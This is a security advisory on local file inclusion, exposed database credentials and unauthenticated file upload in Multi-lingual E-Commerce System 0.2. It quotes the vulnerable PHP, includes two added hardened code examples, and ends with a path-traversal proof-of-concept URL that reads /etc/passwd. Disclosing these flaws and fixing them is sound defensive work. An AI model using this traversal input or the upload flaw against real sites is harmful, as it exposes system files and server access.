
Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities







*******   Salvatore "drosophila" Fresta   *******

[+] Application: Multi-lingual E-Commerce System
[+] Version: 0.2
[+] Website: http://sourceforge.net/projects/mlecsphp/ 

[+] Bugs: [A] Local File Inclusion
          [B] Information Disclosure
          [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 19 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Local File Inclusion

[-] Risk: high
[-] File affected: index.php

This bug allows a guest to include local files.
The following is the vulnerable code:

...

if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];}

...

<?
include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php');
?>

...
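A hardened replacement for the include above, added here as an example and not taken from the project: both request parameters are matched against a fixed allowlist before they touch the file system, and the resolved path is confirmed to lie inside inc/. The allowlists and $include_path are assumptions.

```php
<?php
// Added example, not code from the project: a hardened replacement for the
// include in index.php. The allowlists and $include_path are assumptions.
declare(strict_types=1);
session_start();

$include_path  = __DIR__;                      // assumed: application root
$allowed_langs = ['en', 'it', 'de'];           // assumed: shipped language codes
$allowed_pages = ['home', 'catalog', 'cart'];  // assumed: files under inc/

/**
 * Returns the absolute path of inc/<page>-<lang>.php, or null when the request
 * must be rejected. Both values are matched against a fixed allowlist, so
 * traversal sequences, NUL bytes and foreign extensions never reach include().
 */
function resolve_page_file(string $base, array $pages, array $langs,
                           ?string $page, ?string $lang): ?string
{
    if ($page === null || !in_array($page, $pages, true)) {
        return null;
    }
    if ($lang === null || !in_array($lang, $langs, true)) {
        return null;
    }
    // Defence in depth: even with an allowlist, confirm the resolved file
    // really lives inside inc/ (realpath() collapses any ".." components).
    $incDir = realpath($base . '/inc');
    $target = realpath($base . '/inc/' . $page . '-' . $lang . '.php');
    if ($incDir === false || $target === false
        || strncmp($target, $incDir . DIRECTORY_SEPARATOR, strlen($incDir) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Store the language in the session only after it has been validated.
$lang = $_SESSION['lang'] ?? 'en';
if (isset($_GET['lang']) && in_array($_GET['lang'], $allowed_langs, true)) {
    $lang = $_SESSION['lang'] = $_GET['lang'];
}

$page = $_GET['page'] ?? 'home';
$file = resolve_page_file($include_path, $allowed_pages, $allowed_langs,
                          is_string($page) ? $page : null, $lang);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```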


- [B] Information Disclosure

[-] Risk: medium
[-] File affected: database.inc

This file contains sensitive information such as
the username and password used to connect to the
database. Because the file has only the .inc
extension, the server sends it as plain text and
its content is visible to anyone who requests it.

- [C] Arbitrary File Upload

[-] Risk: medium
[-] File affected: product_image.php

No file in the admin directory checks whether the
user has admin privileges, so a guest can execute
every file contained in this directory.
product_image.php contains a form that uploads
files to the system but does not check the file
extension, so a user can upload arbitrary files.
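An upload handler that closes both gaps described for product_image.php, added here as an example and not taken from the project: it refuses requests without an admin session, verifies the uploaded content is really an image, and discards the client-supplied file name in favour of a generated one with a fixed extension. The session flag name, the upload directory and the accepted image types are assumptions.

```php
<?php
// Added example, not code from the project: a guarded upload handler for a
// script under admin/. Session flag and upload directory are assumptions.
declare(strict_types=1);
session_start();

// 1. Authorization: every script under admin/ must verify the admin session.
if (empty($_SESSION['is_admin'])) {          // assumed: flag set at admin login
    http_response_code(403);
    exit('Forbidden');
}

/**
 * Stores an uploaded image and returns its new file name, or null on rejection.
 * $destDir should not allow script execution (outside the web root, or with
 * PHP handling disabled for it), so a mis-stored file can never be run.
 */
function store_product_image(array $file, string $destDir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // 2. Decide the type from the bytes on disk, not from the client's claim.
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // 3. Never use the submitted name: generate one with a fixed extension so
    //    names like "shell.php", "a.php.jpg" or "../x" cannot reach disk.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

$productId = filter_input(INPUT_POST, 'product', FILTER_VALIDATE_INT);
if ($productId === false || $productId === null || !isset($_FILES['userfile'])) {
    http_response_code(400);
    exit('Bad request');
}
$stored = store_product_image($_FILES['userfile'], __DIR__ . '/../images/products'); // assumed dir
if ($stored === null) {
    http_response_code(400);
    exit('Upload rejected');
}
echo 'Stored image ' . htmlspecialchars($stored) . ' for product ' . $productId;
```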


*************************************************

[+] Code


- [A] Local File Inclusion

http://www.site.com/path/index.php?page=../../../../../etc/passwd 


